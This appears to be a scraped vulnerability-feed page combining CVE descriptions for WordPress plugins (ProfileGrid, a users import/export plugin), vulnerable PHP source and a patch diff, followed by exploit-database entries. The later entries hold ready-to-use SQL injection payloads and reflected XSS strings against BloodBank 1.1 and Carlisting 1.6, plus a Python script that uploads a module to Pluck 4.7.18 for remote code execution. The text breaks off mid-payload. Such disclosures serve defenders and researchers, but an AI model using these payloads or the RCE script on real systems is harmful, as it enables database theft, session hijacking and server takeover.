The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'profile_magic_check_smtp_connection' function in versions up to, and including, 5.5.1. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily. This can be used by attackers to achieve privilege escalation.

CVE-2023-3713: class-profile-magic-admin.php in profilegrid-user-profiles-groups-and-communities/tags/5.4.8/admin – WordPress Plugin Repository

The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'edit_group' handler in versions up to, and including, 5.5.2. This makes it possible for authenticated attackers, with group ownership, to update group options, including the 'associate_role' parameter, which defines the member's role. This issue was partially patched in version 5.5.2 preventing privilege escalation, however, it was fully patched in 5.5.3.

1<?php2$dbhandler \= new PM\_DBhandler;3$pm\_activator \= new Profile\_Magic\_Activator;4$pmrequests \= new PM\_request;5$pm\_sanitizer \= new PM\_sanitizer();6$html\_creator \= new PM\_HTML\_Creator($this\->profile\_magic,$this\->version);7$textdomain \= $this\->profile\_magic;8$path \=  plugin\_dir\_url(\_\_FILE\_\_);9$gid \= filter\_input(INPUT\_GET, 'gid');10if(empty($gid))11{12   $gid \= get\_query\_var('gid');13}1415//echo $gid;die;16if(isset($gid) && !empty($gid))17{18     $gid \= $pmrequests\->pm\_get\_gid\_from\_group\_slug($gid);19}2021$identifier \= 'GROUPS';22if(!isset($gid) || empty($gid))23{24    if(isset($content\['id'\]))25    {26        $gid \= $content\['id'\];27    }28    else29    {30        $gid \= $content\['gid'\];31    }32    33}34$current\_user \= wp\_get\_current\_user();35$row \= $dbhandler\->get\_row('GROUPS',$gid);36$is\_require\_admin\_approval \= $dbhandler\->get\_global\_option\_value('pm\_group\_update\_require\_admin\_approval',0);37$request\_obj \= $pm\_sanitizer\->sanitize($\_REQUEST);38if(isset($request\_obj\["action"\]) && $request\_obj\["action"\]!='process')39{40    if(isset($request\_obj\["uid"\]))$uid \= $request\_obj\["uid"\];else $uid \= false;41    $pm\_payapl\_request \= new PM\_paypal\_request();42    $post\_obj \= $pm\_sanitizer\->sanitize($\_POST);43    $pm\_payapl\_request\->profile\_magic\_join\_group\_payment\_process($post\_obj, $request\_obj\["action"\],$gid,$uid);44    return false;45}46if(isset($\_POST\['remove\_image'\]))47{48        $retrieved\_nonce \= filter\_input(INPUT\_POST,'\_wpnonce');49        if (!wp\_verify\_nonce($retrieved\_nonce, 'save\_pm\_edit\_group' ) ) die(esc\_html\_\_('Failed security check','profilegrid-user-profiles-groups-and-communities') );50        $groupid \= filter\_input(INPUT\_POST,'group\_id');51        52        if($groupid!=0 && $is\_require\_admin\_approval\==0)53        {54                $data \= array('group\_icon'\=>'');55                $arg \= array('%d');56            $dbhandler\->update\_row($identifier,'id',$groupid,$data,$arg,'%d');57        }58        else59        {60            do\_action('profilegrid\_group\_update\_approval',$data,$row,$groupid);61        }62        $redirect\_url \= $pmrequests\->profile\_magic\_get\_frontend\_url('pm\_group\_page','',$groupid);63        //$redirect\_url = add\_query\_arg('gid',$groupid,$redirect\_url);64        wp\_safe\_redirect( esc\_url\_raw( $redirect\_url ) );65        exit;66        67}6869if(isset($\_POST\['cancel'\]))70{71        $retrieved\_nonce \= filter\_input(INPUT\_POST,'\_wpnonce');72        if (!wp\_verify\_nonce($retrieved\_nonce, 'save\_pm\_edit\_group' ) ) die(esc\_html\_\_('Failed security check','profilegrid-user-profiles-groups-and-communities') );73        $groupid \= filter\_input(INPUT\_POST,'group\_id');74        $redirect\_url \= $pmrequests\->profile\_magic\_get\_frontend\_url('pm\_group\_page','',$groupid);75        //$redirect\_url = add\_query\_arg('gid',$groupid,$redirect\_url);76        wp\_safe\_redirect( esc\_url\_raw( $redirect\_url ) );77        exit;78}7980if(isset($\_POST\['edit\_group'\]))81{82        83        $retrieved\_nonce \= filter\_input(INPUT\_POST,'\_wpnonce');84        if (!wp\_verify\_nonce($retrieved\_nonce, 'save\_pm\_edit\_group' ) ) die(esc\_html\_\_('Failed security check','profilegrid-user-profiles-groups-and-communities') );85        $groupid \= filter\_input(INPUT\_POST,'group\_id');86        $exclude \= array("\_wpnonce","\_wp\_http\_referer","edit\_group","group\_id");87        $post \= $pmrequests\->sanitize\_request($\_POST,$identifier,$exclude);88        if(isset($\_FILES\['group\_icon'\])){89            $filefield \= $\_FILES\['group\_icon'\];90            $allowed\_ext \='jpg|jpeg|png|gif';91            if(isset($filefield) && !empty($filefield))92            {93                    $attachment\_id \= $pmrequests\->make\_upload\_and\_get\_attached\_id($filefield,$allowed\_ext);94                    $post\['group\_icon'\] \= $attachment\_id;95            }96        }97        if($post!=false)98        {99                foreach($post as $key\=>$value)100                {101                  $data\[$key\] \= $value;102                  $arg\[\] \= $pm\_activator\->get\_db\_table\_field\_type($identifier,$key);103                }104        }105        if($groupid!=0 && $is\_require\_admin\_approval\==0)106        {107            $dbhandler\->update\_row($identifier,'id',$groupid,$data,$arg,'%d');108            do\_action('profilegrid\_group\_update',$data,$row,$groupid);109        }110        else111        {112            do\_action('profilegrid\_group\_update\_approval',$data,$row,$groupid);113        }114        $redirect\_url \= $pmrequests\->profile\_magic\_get\_frontend\_url('pm\_group\_page','',$groupid);115        //$redirect\_url = add\_query\_arg('gid',$groupid,$redirect\_url);116        wp\_safe\_redirect( esc\_url\_raw( $redirect\_url ) );117        exit;   118}119120if(isset($\_POST\['pg\_join\_group'\]))121{122    $pg\_uid \= filter\_input(INPUT\_POST, 'pg\_uid');123    $pg\_join\_gid \= filter\_input(INPUT\_POST, 'pg\_join\_gid');124    $group\_type \= $pmrequests\->profile\_magic\_get\_group\_type($pg\_join\_gid);125    $is\_paid\_group \= $pmrequests\->profile\_magic\_check\_paid\_group($pg\_join\_gid);126    if($is\_paid\_group\>0)127    {128        $html\_creator\->pg\_join\_paid\_group\_html($pg\_join\_gid, $pg\_uid);129    }130    else131    {132        $result \= $pmrequests\->profile\_magic\_join\_group\_fun($pg\_uid, $pg\_join\_gid,$group\_type);133       134        if($result\==true)135        {136            $redirect\_url \= $pmrequests\->profile\_magic\_get\_frontend\_url('pm\_group\_page','',$pg\_join\_gid);137            //$redirect\_url = add\_query\_arg('gid',$pg\_join\_gid,$redirect\_url);138            wp\_safe\_redirect( esc\_url\_raw( $redirect\_url ) );139            exit;       140        }141        142    }143}144145if(isset($\_POST\['pg\_join\_paid\_group'\]))146{147    $pg\_uid \= filter\_input(INPUT\_POST, 'pg\_uid');148    $pg\_join\_gid \= filter\_input(INPUT\_POST, 'pg\_join\_gid');149    do\_action('profile\_magic\_join\_group\_registration\_process',$\_POST,$pg\_join\_gid,$pg\_uid);150    do\_action('profile\_magic\_join\_paid\_group\_process',$\_POST,$pg\_join\_gid,$pg\_uid);151}152153if(!isset($\_POST\['pg\_join\_group'\]) && !isset($\_POST\['pg\_join\_paid\_group'\])):154if(!empty($row))155{156        $pagenum \= filter\_input(INPUT\_GET, 'pagenum');157        158        $pagenum \= isset($pagenum) ? absint($pagenum) : 1;159        $pm\_default\_group\_sorting \= $dbhandler\->get\_global\_option\_value('pm\_default\_group\_sorting','oldest\_first');160        switch($pm\_default\_group\_sorting)161        {162            case 'name\_asc':163                $sortby \= 'display\_name';164                $order \= 'ASC';165                break;166            case 'name\_desc':167                $sortby \= 'display\_name';168                $order \= 'DESC';169                break;170            case 'latest\_first':171                $sortby \= 'registered';172                $order \= 'DESC';173                break;174             case 'oldest\_first':175                $sortby \= 'registered';176                $order \= 'ASC';177                break;178            case 'suspended':179                $sortby \= 'registered';180                $order \= 'DESC';181                $get\['status'\] \= '1';182                break;183            case 'first\_name\_asc':184                $sortby \= 'first\_name';185                $order \= 'ASC';186                break;187            case 'first\_name\_desc':188                $sortby \= 'first\_name';189                $order \= 'DESC';190                break;191            case 'last\_name\_asc':192                $sortby \= 'last\_name';193                $order \= 'ASC';194                break;195            case 'last\_name\_desc':196                $sortby \= 'last\_name';197                $order \= 'DESC';198                break;199            default:200                $sortby \= 'display\_name';201                $order \= 'ASC';202                break;203            204        }205        206        $limit \= $dbhandler\->get\_global\_option\_value('pm\_number\_of\_users\_on\_group\_page','10'); // number of rows in page207        $offset \= ( $pagenum \- 1 ) \* $limit;208        $hide\_users \= $pmrequests\->pm\_get\_hide\_users\_array();209        $query\_args \= array(210                                                'relation' \=> 'AND',211                                                array(212                                                        'key'     \=> 'pm\_group',213                                                        'value'   \=> sprintf(':"%s";',$gid),214                                                        'compare' \=> 'like'215                                                ),216                                                array(217                                                        'key'     \=> 'rm\_user\_status',218                                                        'value'   \=> '0',219                                                        'compare' \=> '='220                                                )221                                                222                                        );223        224        if($row\->is\_group\_leader!=0)225        {226            $leaders \= $pmrequests\->pg\_get\_group\_leaders($gid);227        }228        if(isset($group\_leader))$exclude \= array($group\_leader);else{ $exclude \= array(); $group\_leader \= 0;}229        $meta\_query \= array( 'relation' \=> 'OR', $query\_args );230        $user\_query \=  $dbhandler\->pm\_get\_all\_users\_ajax('',$meta\_query,'',$offset,$limit,$order,$sortby,$hide\_users);231        $total\_users \= $user\_query\->get\_total();232        $users \= $user\_query\->get\_results();233        $num\_of\_pages \= ceil( $total\_users/$limit);234        $pagination \= $dbhandler\->pm\_get\_pagination($num\_of\_pages,$pagenum);235        if(filter\_input(INPUT\_GET, 'edit') && in\_array($current\_user\->ID,$leaders) && is\_user\_logged\_in())236        {237                 $themepath \= $this\->profile\_magic\_get\_pm\_theme('edit-group-tpl');238                 include $themepath;239        }240        else241        {242                 $themepath \= $this\->profile\_magic\_get\_pm\_theme('group-tpl');243                 include $themepath;    244        }245        246}247else248{249        echo '<div class="pmrow pg-alert-info pg-alert-warning">'. esc\_html\_\_( 'Sorry, this group is currently not accessible. Either it was deleted or its ID does not matches.','profilegrid-user-profiles-groups-and-communities' ).'</div>'; 250}251endif;252?>

CVE-2023-3714: profile-magic-group.php in profilegrid-user-profiles-groups-and-communities/tags/5.4.8/public/partials – WordPress Plugin Repository

The Export and Import Users and Customers plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hf_update_customer' function called via an AJAX action in versions up to, and including, 2.4.1. This makes it possible for authenticated attackers, with shop manager-level permissions to change user passwords and potentially take over administrator accounts.

**users-customers-import-export-for-wp-woocommerce/trunk/admin/css/wt-import-export-for-woo-admin.css**

r2884206

r2938705

 

306

306

  /\* to enable "word-break: break-all" \*/

307

307

  padding: 5px;

308

 

  word-break: break-all; /\* 4. \*/

 

308

  word-break: normal; /\* 4. \*/

309

309

}

310

310

**users-customers-import-export-for-wp-woocommerce/trunk/admin/modules/user/data/data-user-columns.php**

r2912763

r2938705

 

68

68

    $columns\['shipping\_state'\] = 'shipping\_state';

69

69

    $columns\['shipping\_country'\] = 'shipping\_country';

 

70

    $columns\['wc\_last\_active'\] = 'wc\_last\_active';

70

71

   

71

72

endif;

**users-customers-import-export-for-wp-woocommerce/trunk/admin/modules/user/data/data/data-wf-reserved-fields-pair.php**

r2912763

r2938705

 

63

63

    $columns\['shipping\_state'\] = array('title'=>'Shipping state','description'=>'');

64

64

    $columns\['shipping\_country'\] = array('title'=>'Shipping country','description'=>'');

65

 

   

 

65

    $columns\['wc\_last\_active'\] =array('title'=>'Wc last active','description'=>'');

66

66

endif;

67

67

**users-customers-import-export-for-wp-woocommerce/trunk/admin/modules/user/export/export.php**

r2912763

r2938705

 

177

177

        global $wpdb;

178

178

        $csv\_columns = $this->parent\_module->get\_selected\_column\_names();

179

 

       

 

179

180

180

        $user = get\_user\_by('id', $id);

181

 

       

182

181

        $customer\_data = array();

 

182

183

183

        foreach ($csv\_columns as $key => $value) {

184

184

…

…

 

215

215

                continue;

216

216

            }

 

217

            if( $key == 'last\_update'){

 

218

                $date\_in\_timestamp = (!empty($user->{$key})) ? $user->{$key} : 0;

 

219

                $customer\_data\[$key\] = date('Y-m-d H:i:s', $date\_in\_timestamp);

 

220

                continue;

 

221

            }

 

222

            if($key == 'wc\_last\_active'){

 

223

                $date\_in\_timestamp = (!empty($user->{$key})) ? $user->{$key} : 0;

 

224

                $customer\_data\[$key\] = date('Y-m-d', $date\_in\_timestamp);

 

225

                continue;

 

226

            }

 

227

217

228

218

229

            $customer\_data\[$key\] = isset($user->{$key}) ? maybe\_serialize($user->{$key}) : '';

**users-customers-import-export-for-wp-woocommerce/trunk/admin/modules/user/import/import.php**

r2846895

r2938705

 

12

12

    public $parent\_module = null;

13

13

    public $parsed\_data = array();

 

14

    public $user\_all\_fields = array();

 

15

    public $user\_base\_fields = array();

 

16

    public $use\_same\_password = array();

 

17

    public $user\_meta\_fields = array();

 

18

    public $current\_user = array();

14

19

         

15

20

   

…

…

 

33

38

    public function \_\_construct($parent\_object) {

34

39

 

40

        $this->current\_user = get\_current\_user\_id();

35

41

        $this->parent\_module = $parent\_object;

36

42

        $this->user\_all\_fields = include plugin\_dir\_path( \_\_FILE\_\_).'../data/data-user-columns.php';

…

…

 

127

133

     \*/     

128

134

    public function parse\_users( $data ) {

129

 

        

 

135

       

130

136

        try{

131

137

            $data = apply\_filters('wt\_user\_importer\_pre\_parse\_data', $data);

…

…

 

222

228

223

229

            foreach ($this->user\_meta\_fields as $key => $value){

 

230

                if($key == 'wc\_last\_active' || $key == 'last\_update'){

 

231

                    $date = isset( $item\[$key\] ) ? trim($item\[$key\]) : "" ;

 

232

                    $item\[$key\] = strtotime($date);

 

233

                }

224

234

                $user\_meta\[\] = array( 'key' => $key, 'value' => isset( $item\[$key\] ) ? trim($item\[$key\]) : "" );

225

235

            }

226

 

 

236

         

227

237

            // the $user\_details array will now contain the necessary name-value pairs for the wp\_users table, and also any meta data in the 'usermeta' array

228

238

            $parsed\_details = array();

…

…

 

230

240

            $parsed\_details\['user\_details'\] = $user\_details;

231

241

            $parsed\_details\['user\_meta'\] = $user\_meta;

232

 

233

242

            return $parsed\_details;

234

243

        } catch (Exception $e) {

…

…

 

253

262

254

263

            if ($user\_id && $this->merge) {

255

 

                $current\_user = get\_current\_user\_id();

 

264

                $current\_user = $this->current\_user;

256

265

                if ($current\_user == $user\_id) {

257

 

                    $usr\_msg = 'This user is currently logged in hence we cannot update.';

258

 

                    $this->hf\_log\_data\_change('user-csv-import', sprintf(\_\_('> &#8220;%s&#8221;' . $usr\_msg), $user\_id), true);

 

266

                    $this->hf\_log\_data\_change('user-csv-import', sprintf(\_\_('> &#8220;%s&#8221; This user is currently logged in hence we cannot update.'), $user\_id), true);

259

267

                    unset($post);

260

 

                return new WP\_Error( 'parse-error',sprintf(\_\_('> &#8220;%s&#8221;' . $usr\_msg), $user\_id));

261

 

                }

 

268

                return new WP\_Error( 'parse-error',sprintf(\_\_('> &#8220;%s&#8221; This user is currently logged in hence we cannot update.'), $user\_id));

 

269

                }

 

270

                $user = get\_userdata($user\_id);

 

271

                $roles = $user->roles;

 

272

                $only\_update\_admin\_with\_admin = apply\_filters('wt\_ier\_update\_admin\_only\_by\_admin\_user', true);

 

273

                if(in\_array('administrator', $roles) && $only\_update\_admin\_with\_admin ){

 

274

                    $current\_user = get\_userdata($current\_user);

 

275

                    $current\_roles = $current\_user->roles;

 

276

                    if(!in\_array('administrator', $current\_roles)){

 

277

                        return new WP\_Error( 'parse-error',sprintf(\_\_('> &#8220;%s&#8221; Only a user with an Administrator role has the capability to update a user with an Administrator role.'), $user\_id));

 

278

                    }

 

279

                }

 

280

262

281

                $user\_id = $this->hf\_update\_customer($user\_id, $post);

263

282

            } else {

**users-customers-import-export-for-wp-woocommerce/trunk/includes/class-wt-import-export-for-woo.php**

r2927717

r2938705

 

81

81

            $this->version = WT\_U\_IEW\_VERSION;

82

82

        } else {

83

 

            $this->version = '2.4.1';

 

83

            $this->version = '2.4.2';

84

84

        }

85

85

        $this->plugin\_name = 'wt-import-export-for-woo-basic';

**users-customers-import-export-for-wp-woocommerce/trunk/readme.txt**

r2927717

r2938705

 

6

6

Tested up to: 6.2

7

7

Requires PHP: 5.6

8

 

Stable tag: 2.4.1

 

8

Stable tag: 2.4.2

9

9

License: GPLv3

10

10

License URI: http://www.gnu.org/licenses/gpl-3.0.html

…

…

 

26

26

&#128312; Export specific users based on username/email - Suggests email addresses and names in export data filter fields while you type in.

27

27

&#128312; Tested OK with WordPress 6.2

28

 

&#128312; Tested OK with WooCommerce 7.8

 

28

&#128312; Tested OK with WooCommerce 7.8.2

29

29

&#128312; Tested OK with PHP 8.2

30

30

…

…

 

206

206

\== Changelog ==

207

207

 

208

\= 2.4.2 2023-07-14 =

 

209

\* \[Fix\] - Admin user details are updated when importing as shop manager.

 

210

\* \[Add\] - Export and Import the last activity data of users.

 

211

\* \[Compatibility\] - Tested OK with WooCommerce 7.8.2

208

212

\= 2.4.1 2023-06-19 =

209

213

\* \[Fix\] – Importing custom CSV with a colon in the column heading.

…

…

 

452

456

\== Upgrade Notice ==

453

457

454

 

\= 2.4.1 =

455

 

\* \[Fix\] – Importing custom CSV with a colon in the column heading.

456

 

\* \[Fix\] – Auto delete history option does not delete import logs

457

 

\* \[Update\] – Tested OK with WooCommerce 7.8

 

458

\= 2.4.2 =

 

459

\* \[Fix\] \- Admin user details are updated when importing as shop manager.

 

460

\* \[Add\] - Export and Import the last activity data of users.

 

461

\* \[Compatibility\] - Tested OK with WooCommerce 7.8.2

**users-customers-import-export-for-wp-woocommerce/trunk/users-customers-import-export-for-wp-woocommerce.php**

r2927717

r2938705

 

6

6

  Author: WebToffee

7

7

  Author URI: https://www.webtoffee.com/product/wordpress-users-woocommerce-customers-import-export/

8

 

  Version: 2.4.1

 

8

  Version: 2.4.2

9

9

  Text Domain: users-customers-import-export-for-wp-woocommerce

10

10

  Domain Path: /languages

11

 

  WC tested up to: 7.8

 

11

  WC tested up to: 7.8.2

12

12

  Requires at least: 3.0

13

13

  Requires PHP: 5.6

…

…

 

49

49

 \* Rename this for your plugin and update it as you release new versions.

50

50

 \*/

51

 

define('WT\_U\_IEW\_VERSION', '2.4.1');

 

51

define('WT\_U\_IEW\_VERSION', '2.4.2');

52

52

53

53

/\*\*

CVE-2023-3459: Changeset 2938705 for users-customers-import-export-for-wp-woocommerce – WordPress Plugin Repository

BloodBank version 1.1 suffers from a remote SQL injection vulnerability.

    # Exploit Title: BloodBank 1.1 - SQL Injection# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/bloodbank/# Tested on: Windows 10 Pro# Impact: Database Access## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /bloodbank/searchPOST parameter 'country' is vulnerable to SQL InjectionPOST parameter 'city' is vulnerable to SQL InjectionPOST parameter 'blood_group_id' is vulnerable to SQL Injection-----------------------------------------------------------POST /bloodbank/search HTTP/2country=[SQLI]&city=[SQLI]&blood_group_id=[SQLI]&form_search=Search+Donor--------------------------------------------------------------Parameter: country (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: country=123'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&city=123&blood_group_id=2&form_search=Search+DonorParameter: city (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: country=123&city=123'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&blood_group_id=2&form_search=Search+DonorParameter: blood_group_id (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: country=123&city=123&blood_group_id=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&form_search=Search+Donor---[-] Done

BloodBank 1.1 SQL Injection

BloodBank version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: BloodBank 1.1 - Reflected XSS# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/bloodbank/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /bloodbank/page.phpURL parameter is vulnerable to RXSShttps://website/bloodbank/page.php/jr88z"><script>alert(1)</script>h6n9w?slug=blog&page=2[-] Done

BloodBank 1.1 Cross Site Scripting

Carlisting version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Carlisting 1.6 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/carlisting/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /carlisting/search.phpGET parameter 'country' is vulnerable to RXSSGET parameter 'state' is vulnerable to RXSSGET parameter 'city' is vulnerable to RXSShttps://website/carlisting/search.php?brand_id=1&model_id=1&car_condition=New%20Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=[XSS]&state=[XSS]&city=[XSS][-] Done

Carlisting 1.6 Cross Site Scripting

Pluck version 4.7.18 suffers from a remote code execution vulnerability.

    #Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)#Application: pluck#Version: 4.7.18#Bugs:  RCE#Technology: PHP#Vendor URL: https://github.com/pluck-cms/pluck#Software Link: https://github.com/pluck-cms/pluck#Date of found: 10-07-2023#Author: Mirabbas Ağalarov#Tested on: Linux import requestsfrom requests_toolbelt.multipart.encoder import MultipartEncoderlogin_url = "http://localhost/pluck/login.php"upload_url = "http://localhost/pluck/admin.php?action=installmodule"headers = {"Referer": login_url,}login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}file_path = input("ZIP file path: ")multipart_data = MultipartEncoder(    fields={        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),        "submit": "Upload"    })session = requests.Session()login_response = session.post(login_url, headers=headers, data=login_payload)if login_response.status_code == 200:    print("Login account")     upload_headers = {        "Referer": upload_url,        "Content-Type": multipart_data.content_type    }    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)        if upload_response.status_code == 200:        print("ZIP file download.")    else:        print("ZIP file download error. Response code:", upload_response.status_code)else:    print("Login problem. response code:", login_response.status_code)rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"rce=requests.get(rce_url)print(rce.text)

Pluck 4.7.18 Remote Code Execution

Carlisting version 1.6 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Carlisting 1.6 - SQL Injection# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/carlisting/# Tested on: Windows 10 Pro# Impact: Database Access## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /carlisting/search.phpGET parameter 'brand_id' is vulnerable to SQL InjectionGET parameter 'model_id' is vulnerable to SQL InjectionGET parameter 'car_condition' is vulnerable to SQL InjectionGET parameter 'car_category_id' is vulnerable to SQL InjectionGET parameter 'body_type_id' is vulnerable to SQL InjectionGET parameter 'fuel_type_id' is vulnerable to SQL InjectionGET parameter 'transmission_type_id' is vulnerable to SQL InjectionGET parameter 'year' is vulnerable to SQL InjectionGET parameter 'mileage_start' is vulnerable to SQL InjectionGET parameter 'mileage_end' is vulnerable to SQL InjectionGET parameter 'country' is vulnerable to SQL InjectionGET parameter 'state' is vulnerable to SQL InjectionGET parameter 'city' is vulnerable to SQL Injectionhttps://website/carlisting/search.php?brand_id=[SQLI]&model_id=[SQLI]&car_condition=[SQLI]&price_range=1&car_category_id=[SQLI]&body_type_id=[SQLI]&fuel_type_id=[SQLI]&transmission_type_id=[SQLI]&year=[SQLI]&mileage_start=[SQLI]&mileage_end=[SQLI]&country=[SQLI]&state=[SQLI]&city=[SQLI]---Parameter: brand_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: model_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: car_condition (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: car_category_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: body_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: fuel_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: transmission_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: year (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: mileage_start (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_end=200&country=USA&state=CA&city=LosParameter: mileage_end (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&country=USA&state=CA&city=LosParameter: country (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, 